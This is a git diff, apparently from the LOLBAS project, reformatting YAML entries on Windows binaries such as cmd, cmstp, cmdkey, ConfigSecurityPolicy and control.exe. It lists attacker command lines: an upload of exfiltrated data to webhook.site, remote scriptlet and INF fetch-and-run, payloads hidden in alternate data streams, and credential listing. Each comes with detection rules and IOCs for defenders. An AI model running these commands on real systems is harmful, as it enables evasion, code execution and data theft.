https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_certutil_encode.yml - - Sigma: https://github.com/SigmaHQ/sigma/blob/e9260679d4aeae7f696001c5b14d318d31c8f076/rules/windows/process_creation/process_creation_root_certificate_installed.yml - - Elastic: https://github.com/elastic/detection-rules/blob/4a11ef9514938e7a7e32cf5f379e975cebf5aed3/rules/windows/defense_evasion_suspicious_certutil_commands.toml - - Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/command_and_control_certutil_network_connection.toml - - Splunk: https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/certutil_download_with_urlcache_and_split_arguments.yml - - Splunk: https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/certutil_download_with_verifyctl_and_split_arguments.yml - - Splunk: https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/certutil_with_decode_argument.yml - - IOC: Certutil.exe creating new files on disk - - IOC: Useragent Microsoft-CryptoAPI/10.0 - - IOC: Useragent CertUtil URL Agent +- Sigma: https://github.com/SigmaHQ/sigma/blob/0fcbce993288f993e626494a50dad15fc26c8a0c/rules/windows/process_creation/win_susp_certutil_command.yml +- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_certutil_encode.yml +- Sigma: https://github.com/SigmaHQ/sigma/blob/e9260679d4aeae7f696001c5b14d318d31c8f076/rules/windows/process_creation/process_creation_root_certificate_installed.yml +- Elastic: https://github.com/elastic/detection-rules/blob/4a11ef9514938e7a7e32cf5f379e975cebf5aed3/rules/windows/defense_evasion_suspicious_certutil_commands.toml +- Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/command_and_control_certutil_network_connection.toml +- Splunk: https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/certutil_download_with_urlcache_and_split_arguments.yml +- Splunk: https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/certutil_download_with_verifyctl_and_split_arguments.yml +- Splunk: https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/certutil_with_decode_argument.yml +- IOC: Certutil.exe creating new files on disk +- IOC: Useragent Microsoft-CryptoAPI/10.0 +- IOC: Useragent CertUtil URL Agent +- Splunk: https://research.splunk.com/endpoint/801ad9e4-8bfb-11eb-8b31-acde48001122/ +- Splunk: https://research.splunk.com/endpoint/415b4306-8bfb-11eb-85c4-acde48001122/ +- Splunk: https://research.splunk.com/endpoint/bfe94226-8c10-11eb-a4b3-acde48001122/ Resources: - - Link: https://twitter.com/Moriarty_Meng/status/984380793383370752 - - Link: https://twitter.com/mattifestation/status/620107926288515072 - - Link: https://twitter.com/egre55/status/1087685529016193025 +- Link: https://twitter.com/Moriarty_Meng/status/984380793383370752 +- Link: https://twitter.com/mattifestation/status/620107926288515072 +- Link: https://twitter.com/egre55/status/1087685529016193025 Acknowledgement: - - Person: Matt Graeber - Handle: '@mattifestation' - - Person: Moriarty - Handle: '@Moriarty_Meng' - - Person: egre55 - Handle: '@egre55' - - Person: Lior Adar ---- +- Person: Matt Graeber + Handle: '@mattifestation' +- Person: Moriarty + Handle: '@Moriarty_Meng' +- Person: egre55 + Handle: '@egre55' +- Person: Lior Adar diff --git a/yml/OSBinaries/Cmd.yml b/yml/OSBinaries/Cmd.yml index c67db323a..1b876cd29 100644 --- a/yml/OSBinaries/Cmd.yml +++ b/yml/OSBinaries/Cmd.yml @@ -1,37 +1,42 @@ ---- Name: Cmd.exe Description: The command-line interpreter in Windows -Author: 'Ye Yint Min Thu Htut' +Author: Ye Yint Min Thu Htut Created: 2019-06-26 Commands: - - Command: cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct ^scrobj.dll > fakefile.doc:payload.bat - Description: Add content to an Alternate Data Stream (ADS). - Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism - Category: ADS - Privileges: User - MitreID: T1059.003 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - - Command: cmd.exe - < fakefile.doc:payload.bat - Description: Execute payload.bat stored in an Alternate Data Stream (ADS). - Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism - Category: ADS - Privileges: User - MitreID: T1059.003 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 +- Command: cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct + ^scrobj.dll > fakefile.doc:payload.bat + Description: Add content to an Alternate Data Stream (ADS). + Usecase: Can be used to evade defensive countermeasures or to hide as a persistence + mechanism + Category: ADS + Privileges: User + MitreID: T1059.003 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 +- Command: cmd.exe - < fakefile.doc:payload.bat + Description: Execute payload.bat stored in an Alternate Data Stream (ADS). + Usecase: Can be used to evade defensive countermeasures or to hide as a persistence + mechanism + Category: ADS + Privileges: User + MitreID: T1059.003 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full_Path: - - Path: C:\Windows\System32\cmd.exe - - Path: C:\Windows\SysWOW64\cmd.exe +- Path: C:\Windows\System32\cmd.exe +- Path: C:\Windows\SysWOW64\cmd.exe Code_Sample: -- Code: +- Code: null Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/688df3405afd778d63a2ea36a084344a2052848c/rules/windows/process_creation/process_creation_alternate_data_streams.yml - - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_ads_file_creation.toml - - Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml - - IOC: cmd.exe executing files from alternate data streams. - - IOC: cmd.exe creating/modifying file contents in an alternate data stream. +- Sigma: https://github.com/SigmaHQ/sigma/blob/688df3405afd778d63a2ea36a084344a2052848c/rules/windows/process_creation/process_creation_alternate_data_streams.yml +- Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_ads_file_creation.toml +- Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml +- IOC: cmd.exe executing files from alternate data streams. +- IOC: cmd.exe creating/modifying file contents in an alternate data stream. +- Splunk: https://research.splunk.com/endpoint/dcfd6b40-42f9-469d-a433-2e53f7486664/ +- Splunk: https://research.splunk.com/endpoint/54a6ed00-3256-11ec-b031-acde48001122/ +- Splunk: https://research.splunk.com/endpoint/eb277ba0-b96b-11eb-b00e-acde48001122/ +- Splunk: https://research.splunk.com/endpoint/b89919ed-fe5f-492c-b139-95dbb162039e/ Resources: - - Link: https://twitter.com/yeyint_mth/status/1143824979139579904 +- Link: https://twitter.com/yeyint_mth/status/1143824979139579904 Acknowledgement: - - Person: r0lan - Handle: '@yeyint_mth' ---- +- Person: r0lan + Handle: '@yeyint_mth' diff --git a/yml/OSBinaries/Cmdkey.yml b/yml/OSBinaries/Cmdkey.yml index 90ef75d08..9e14b66fb 100644 --- a/yml/OSBinaries/Cmdkey.yml +++ b/yml/OSBinaries/Cmdkey.yml @@ -1,27 +1,25 @@ ---- Name: Cmdkey.exe Description: creates, lists, and deletes stored user names and passwords or credentials. -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: cmdkey /list - Description: List cached credentials - Usecase: Get credential information from host - Category: Credentials - Privileges: User - MitreID: T1078 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 +- Command: cmdkey /list + Description: List cached credentials + Usecase: Get credential information from host + Category: Credentials + Privileges: User + MitreID: T1078 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full_Path: - - Path: C:\Windows\System32\cmdkey.exe - - Path: C:\Windows\SysWOW64\cmdkey.exe +- Path: C:\Windows\System32\cmdkey.exe +- Path: C:\Windows\SysWOW64\cmdkey.exe Code_Sample: -- Code: +- Code: null Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/c3c152d457773454f67895008a1abde823be0755/rules/windows/process_creation/win_cmdkey_recon.yml +- Sigma: https://github.com/SigmaHQ/sigma/blob/c3c152d457773454f67895008a1abde823be0755/rules/windows/process_creation/win_cmdkey_recon.yml Resources: - - Link: https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation - - Link: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmdkey +- Link: https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation +- Link: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmdkey Acknowledgement: - - Person: - Handle: ---- +- Person: null + Handle: null diff --git a/yml/OSBinaries/Cmdl32.yml b/yml/OSBinaries/Cmdl32.yml index 275827c71..5252c2269 100644 --- a/yml/OSBinaries/Cmdl32.yml +++ b/yml/OSBinaries/Cmdl32.yml @@ -1,26 +1,26 @@ ---- Name: cmdl32.exe Description: Microsoft Connection Manager Auto-Download -Author: 'Elliot Killick' +Author: Elliot Killick Created: '2021-08-26' Commands: - - Command: cmdl32 /vpn /lan %cd%\config - Description: Download a file from the web address specified in the configuration file. The downloaded file will be in %TMP% under the name VPNXXXX.tmp where "X" denotes a random number or letter. - Usecase: Download file from Internet - Category: Download - Privileges: User - MitreID: T1105 - OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10 +- Command: cmdl32 /vpn /lan %cd%\config + Description: Download a file from the web address specified in the configuration + file. The downloaded file will be in %TMP% under the name VPNXXXX.tmp where "X" + denotes a random number or letter. + Usecase: Download file from Internet + Category: Download + Privileges: User + MitreID: T1105 + OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full_Path: - - Path: C:\Windows\System32\cmdl32.exe - - Path: C:\Windows\SysWOW64\cmdl32.exe +- Path: C:\Windows\System32\cmdl32.exe +- Path: C:\Windows\SysWOW64\cmdl32.exe Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/3416db73016f25ce115f5597fe74320d2428db66/rules/windows/process_creation/win_pc_susp_cmdl32_lolbas.yml - - IOC: Reports of downloading from suspicious URLs in %TMP%\config.log - - IOC: Useragent Microsoft(R) Connection Manager Vpn File Update +- Sigma: https://github.com/SigmaHQ/sigma/blob/3416db73016f25ce115f5597fe74320d2428db66/rules/windows/process_creation/win_pc_susp_cmdl32_lolbas.yml +- IOC: Reports of downloading from suspicious URLs in %TMP%\config.log +- IOC: Useragent Microsoft(R) Connection Manager Vpn File Update Resources: - - Link: https://github.com/LOLBAS-Project/LOLBAS/pull/151 +- Link: https://github.com/LOLBAS-Project/LOLBAS/pull/151 Acknowledgement: - - Person: Elliot Killick - Handle: '@elliotkillick' ---- +- Person: Elliot Killick + Handle: '@elliotkillick' diff --git a/yml/OSBinaries/Cmstp.yml b/yml/OSBinaries/Cmstp.yml index 0f00d4e43..ae3ca3fa3 100644 --- a/yml/OSBinaries/Cmstp.yml +++ b/yml/OSBinaries/Cmstp.yml @@ -1,47 +1,51 @@ ---- Name: Cmstp.exe Description: Installs or removes a Connection Manager service profile. -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: cmstp.exe /ni /s c:\cmstp\CorpVPN.inf - Description: Silently installs a specially formatted local .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll. - Usecase: Execute code hidden within an inf file. Download and run scriptlets from internet. - Category: Execute - Privileges: User - MitreID: T1218.003 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - - Command: cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf - Description: Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll. - Usecase: Execute code hidden within an inf file. Execute code directly from Internet. - Category: AwL bypass - Privileges: User - MitreID: T1218.003 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 +- Command: cmstp.exe /ni /s c:\cmstp\CorpVPN.inf + Description: Silently installs a specially formatted local .INF without creating + a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes + a .SCT file using scrobj.dll. + Usecase: Execute code hidden within an inf file. Download and run scriptlets from + internet. + Category: Execute + Privileges: User + MitreID: T1218.003 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 +- Command: cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf + Description: Silently installs a specially formatted remote .INF without creating + a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes + a .SCT file using scrobj.dll. + Usecase: Execute code hidden within an inf file. Execute code directly from Internet. + Category: AwL bypass + Privileges: User + MitreID: T1218.003 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full_Path: - - Path: C:\Windows\System32\cmstp.exe - - Path: C:\Windows\SysWOW64\cmstp.exe +- Path: C:\Windows\System32\cmstp.exe +- Path: C:\Windows\SysWOW64\cmstp.exe Code_Sample: - - Code: +- Code: null Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/6d0d58dfe240f7ef46e7da928c0b65223a46c3b2/rules/windows/process_creation/sysmon_cmstp_execution_by_creation.yml - - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_uac_cmstp.yml - - Splunk: https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/cmlua_or_cmstplua_uac_bypass.yml - - Elastic: https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml - - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml - - IOC: Execution of cmstp.exe without a VPN use case is suspicious - - IOC: DotNet CLR libraries loaded into cmstp.exe - - IOC: DotNet CLR Usage Log - cmstp.exe.log +- Sigma: https://github.com/SigmaHQ/sigma/blob/6d0d58dfe240f7ef46e7da928c0b65223a46c3b2/rules/windows/process_creation/sysmon_cmstp_execution_by_creation.yml +- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_uac_cmstp.yml +- Splunk: https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/cmlua_or_cmstplua_uac_bypass.yml +- Elastic: https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml +- Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml +- IOC: Execution of cmstp.exe without a VPN use case is suspicious +- IOC: DotNet CLR libraries loaded into cmstp.exe +- IOC: DotNet CLR Usage Log - cmstp.exe.log +- Splunk: https://research.splunk.com/endpoint/f87b5062-b405-11eb-a889-acde48001122/ Resources: - - Link: https://twitter.com/NickTyrer/status/958450014111633408 - - Link: https://gist.github.com/NickTyrer/bbd10d20a5bb78f64a9d13f399ea0f80 - - Link: https://gist.github.com/api0cradle/cf36fd40fa991c3a6f7755d1810cc61e - - Link: https://oddvar.moe/2017/08/15/research-on-cmstp-exe/ - - Link: https://gist.githubusercontent.com/tylerapplebaum/ae8cb38ed8314518d95b2e32a6f0d3f1/raw/3127ba7453a6f6d294cd422386cae1a5a2791d71/UACBypassCMSTP.ps1 - - Link: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmstp +- Link: https://twitter.com/NickTyrer/status/958450014111633408 +- Link: https://gist.github.com/NickTyrer/bbd10d20a5bb78f64a9d13f399ea0f80 +- Link: https://gist.github.com/api0cradle/cf36fd40fa991c3a6f7755d1810cc61e +- Link: https://oddvar.moe/2017/08/15/research-on-cmstp-exe/ +- Link: https://gist.githubusercontent.com/tylerapplebaum/ae8cb38ed8314518d95b2e32a6f0d3f1/raw/3127ba7453a6f6d294cd422386cae1a5a2791d71/UACBypassCMSTP.ps1 +- Link: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmstp Acknowledgement: - - Person: Oddvar Moe - Handle: '@oddvarmoe' - - Person: Nick Tyrer - Handle: '@NickTyrer' ---- +- Person: Oddvar Moe + Handle: '@oddvarmoe' +- Person: Nick Tyrer + Handle: '@NickTyrer' diff --git a/yml/OSBinaries/ConfigSecurityPolicy.yml b/yml/OSBinaries/ConfigSecurityPolicy.yml index 286db848b..2ef738b4f 100644 --- a/yml/OSBinaries/ConfigSecurityPolicy.yml +++ b/yml/OSBinaries/ConfigSecurityPolicy.yml @@ -1,32 +1,36 @@ ---- Name: ConfigSecurityPolicy.exe -Description: Binary part of Windows Defender. Used to manage settings in Windows Defender. you can configure different pilot collections for each of the co-management workloads. Being able to use different pilot collections allows you to take a more granular approach when shifting workloads. -Author: 'Ialle Teixeira' +Description: Binary part of Windows Defender. Used to manage settings in Windows Defender. + you can configure different pilot collections for each of the co-management workloads. + Being able to use different pilot collections allows you to take a more granular + approach when shifting workloads. +Author: Ialle Teixeira Created: 2020-09-04 Commands: - - Command: ConfigSecurityPolicy.exe C:\\Windows\\System32\\calc.exe https://webhook.site/xxxxxxxxx?encodedfile - Description: Upload file, credentials or data exfiltration in general - Usecase: Upload file - Category: Upload - Privileges: User - MitreID: T1567 - OperatingSystem: Windows 10 +- Command: ConfigSecurityPolicy.exe C:\\Windows\\System32\\calc.exe https://webhook.site/xxxxxxxxx?encodedfile + Description: Upload file, credentials or data exfiltration in general + Usecase: Upload file + Category: Upload + Privileges: User + MitreID: T1567 + OperatingSystem: Windows 10 Full_Path: - - Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\ConfigSecurityPolicy.exe +- Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\ConfigSecurityPolicy.exe Code_Sample: - - Code: +- Code: null Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/5e57e476c29980800dcc88a7a001ddb75d21a58b/rules/windows/process_creation/win_pc_lolbas_configsecuritypolicy.yml - - IOC: ConfigSecurityPolicy storing data into alternate data streams. - - IOC: Preventing/Detecting ConfigSecurityPolicy with non-RFC1918 addresses by Network IPS/IDS. - - IOC: Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching ConfigSecurityPolicy.exe. - - IOC: User Agent is "MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)" +- Sigma: https://github.com/SigmaHQ/sigma/blob/5e57e476c29980800dcc88a7a001ddb75d21a58b/rules/windows/process_creation/win_pc_lolbas_configsecuritypolicy.yml +- IOC: ConfigSecurityPolicy storing data into alternate data streams. +- IOC: Preventing/Detecting ConfigSecurityPolicy with non-RFC1918 addresses by Network + IPS/IDS. +- IOC: Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching + ConfigSecurityPolicy.exe. +- IOC: User Agent is "MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; + .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)" Resources: - - Link: https://docs.microsoft.com/en-US/mem/configmgr/comanage/how-to-switch-workloads - - Link: https://docs.microsoft.com/en-US/mem/configmgr/comanage/workloads - - Link: https://docs.microsoft.com/en-US/mem/configmgr/comanage/how-to-monitor - - Link: https://twitter.com/NtSetDefault/status/1302589153570365440?s=20 +- Link: https://docs.microsoft.com/en-US/mem/configmgr/comanage/how-to-switch-workloads +- Link: https://docs.microsoft.com/en-US/mem/configmgr/comanage/workloads +- Link: https://docs.microsoft.com/en-US/mem/configmgr/comanage/how-to-monitor +- Link: https://twitter.com/NtSetDefault/status/1302589153570365440?s=20 Acknowledgement: - - Person: Ialle Teixeira - Handle: '@NtSetDefault' ---- +- Person: Ialle Teixeira + Handle: '@NtSetDefault' diff --git a/yml/OSBinaries/Conhost.yml b/yml/OSBinaries/Conhost.yml index 0ed5c87ac..bc18c854e 100644 --- a/yml/OSBinaries/Conhost.yml +++ b/yml/OSBinaries/Conhost.yml @@ -1,27 +1,25 @@ ---- Name: Conhost.exe Description: Console Window host Author: Wietze Beukema Created: 2022-04-05 Commands: - - Command: "conhost.exe calc.exe" - Description: Execute calc.exe with conhost.exe as parent process - Usecase: Use conhost.exe as a proxy binary to evade defensive counter-measures - Category: Execute - Privileges: User - MitreID: T1202 - OperatingSystem: Windows 10, Windows 11 +- Command: conhost.exe calc.exe + Description: Execute calc.exe with conhost.exe as parent process + Usecase: Use conhost.exe as a proxy binary to evade defensive counter-measures + Category: Execute + Privileges: User + MitreID: T1202 + OperatingSystem: Windows 10, Windows 11 Full_Path: - - Path: c:\windows\system32\conhost.exe +- Path: c:\windows\system32\conhost.exe Detection: - - IOC: conhost.exe spawning unexpected processes - - Sigma: https://github.com/SigmaHQ/sigma/blob/bea6f18d350d9c9fdc067f93dde0e9b11cc22dc2/rules/windows/process_creation/proc_creation_win_susp_conhost.yml +- IOC: conhost.exe spawning unexpected processes +- Sigma: https://github.com/SigmaHQ/sigma/blob/bea6f18d350d9c9fdc067f93dde0e9b11cc22dc2/rules/windows/process_creation/proc_creation_win_susp_conhost.yml Resources: - - Link: https://www.hexacorn.com/blog/2020/05/25/how-to-con-your-host/ - - Link: https://twitter.com/Wietze/status/1511397781159751680 +- Link: https://www.hexacorn.com/blog/2020/05/25/how-to-con-your-host/ +- Link: https://twitter.com/Wietze/status/1511397781159751680 Acknowledgement: - - Person: Adam - Handle: '@hexacorn' - - Person: Wietze - Handle: '@wietze' ---- +- Person: Adam + Handle: '@hexacorn' +- Person: Wietze + Handle: '@wietze' diff --git a/yml/OSBinaries/Control.yml b/yml/OSBinaries/Control.yml index 148aa254d..fc765464c 100644 --- a/yml/OSBinaries/Control.yml +++ b/yml/OSBinaries/Control.yml @@ -1,37 +1,37 @@ ---- Name: Control.exe Description: Binary used to launch controlpanel items in Windows -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: control.exe c:\windows\tasks\file.txt:evil.dll - Description: Execute evil.dll which is stored in an Alternate Data Stream (ADS). - Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism - Category: ADS - Privileges: User - MitreID: T1218.002 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 +- Command: control.exe c:\windows\tasks\file.txt:evil.dll + Description: Execute evil.dll which is stored in an Alternate Data Stream (ADS). + Usecase: Can be used to evade defensive countermeasures or to hide as a persistence + mechanism + Category: ADS + Privileges: User + MitreID: T1218.002 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full_Path: - - Path: C:\Windows\System32\control.exe - - Path: C:\Windows\SysWOW64\control.exe +- Path: C:\Windows\System32\control.exe +- Path: C:\Windows\SysWOW64\control.exe Code_Sample: -- Code: +- Code: null Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/e8b633f54fce88e82b1c3d5e7c7bfa7d3d0beee7/rules/windows/process_creation/win_susp_control_cve_2021_40444.yml - - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_control_dll_load.yml - - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml - - Elastic: https://github.com/elastic/detection-rules/blob/0875c1e4c4370ab9fbf453c8160bb5abc8ad95e7/rules/windows/defense_evasion_execution_control_panel_suspicious_args.toml - - Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml - - IOC: Control.exe executing files from alternate data streams - - IOC: Control.exe executing library file without cpl extension - - IOC: Suspicious network connections from control.exe +- Sigma: https://github.com/SigmaHQ/sigma/blob/e8b633f54fce88e82b1c3d5e7c7bfa7d3d0beee7/rules/windows/process_creation/win_susp_control_cve_2021_40444.yml +- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_control_dll_load.yml +- Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml +- Elastic: https://github.com/elastic/detection-rules/blob/0875c1e4c4370ab9fbf453c8160bb5abc8ad95e7/rules/windows/defense_evasion_execution_control_panel_suspicious_args.toml +- Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml +- IOC: Control.exe executing files from alternate data streams +- IOC: Control.exe executing library file without cpl extension +- IOC: Suspicious network connections from control.exe +- Splunk: https://research.splunk.com/endpoint/10423ac4-10c9-11ec-8dc4-acde48001122/ Resources: - - Link: https://pentestlab.blog/2017/05/24/applocker-bypass-control-panel/ - - Link: https://www.contextis.com/resources/blog/applocker-bypass-registry-key-manipulation/ - - Link: https://twitter.com/bohops/status/955659561008017409 - - Link: https://docs.microsoft.com/en-us/windows/desktop/shell/executing-control-panel-items - - Link: https://bohops.com/2018/01/23/loading-alternate-data-stream-ads-dll-cpl-binaries-to-bypass-applocker/ +- Link: https://pentestlab.blog/2017/05/24/applocker-bypass-control-panel/ +- Link: https://www.contextis.com/resources/blog/applocker-bypass-registry-key-manipulation/ +- Link: https://twitter.com/bohops/status/955659561008017409 +- Link: https://docs.microsoft.com/en-us/windows/desktop/shell/executing-control-panel-items +- Link: https://bohops.com/2018/01/23/loading-alternate-data-stream-ads-dll-cpl-binaries-to-bypass-applocker/ Acknowledgement: - - Person: Jimmy - Handle: '@bohops' ---- +- Person: Jimmy + Handle: '@bohops' diff --git a/yml/OSBinaries/Csc.yml b/yml/OSBinaries/Csc.yml index 44d7da96a..0478b7193 100644 --- a/yml/OSBinaries/Csc.yml +++ b/yml/OSBinaries/Csc.yml @@ -1,37 +1,37 @@ ---- Name: Csc.exe Description: Binary file used by .NET to compile C# code -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: csc.exe -out:My.exe File.cs - Description: Use CSC.EXE to compile C# code stored in File.cs and output the compiled version to My.exe. - Usecase: Compile attacker code on system. Bypass defensive counter measures. - Category: Compile - Privileges: User - MitreID: T1127 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - - Command: csc -target:library File.cs - Description: Use CSC.EXE to compile C# code stored in File.cs and output the compiled version to a dll file. - Usecase: Compile attacker code on system. Bypass defensive counter measures. - Category: Compile - Privileges: User - MitreID: T1127 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 +- Command: csc.exe -out:My.exe File.cs + Description: Use CSC.EXE to compile C# code stored in File.cs and output the compiled + version to My.exe. + Usecase: Compile attacker code on system. Bypass defensive counter measures. + Category: Compile + Privileges: User + MitreID: T1127 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 +- Command: csc -target:library File.cs + Description: Use CSC.EXE to compile C# code stored in File.cs and output the compiled + version to a dll file. + Usecase: Compile attacker code on system. Bypass defensive counter measures. + Category: Compile + Privileges: User + MitreID: T1127 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full_Path: - - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Csc.exe - - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Csc.exe +- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Csc.exe +- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Csc.exe Code_Sample: -- Code: +- Code: null Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_csc.yml - - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_csc_folder.yml - - Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_dotnet_compiler_parent_process.toml - - Elastic: https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_execution_msbuild_started_unusal_process.toml - - IOC: Csc.exe should normally not run as System account unless it is used for development. +- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_csc.yml +- Sigma: 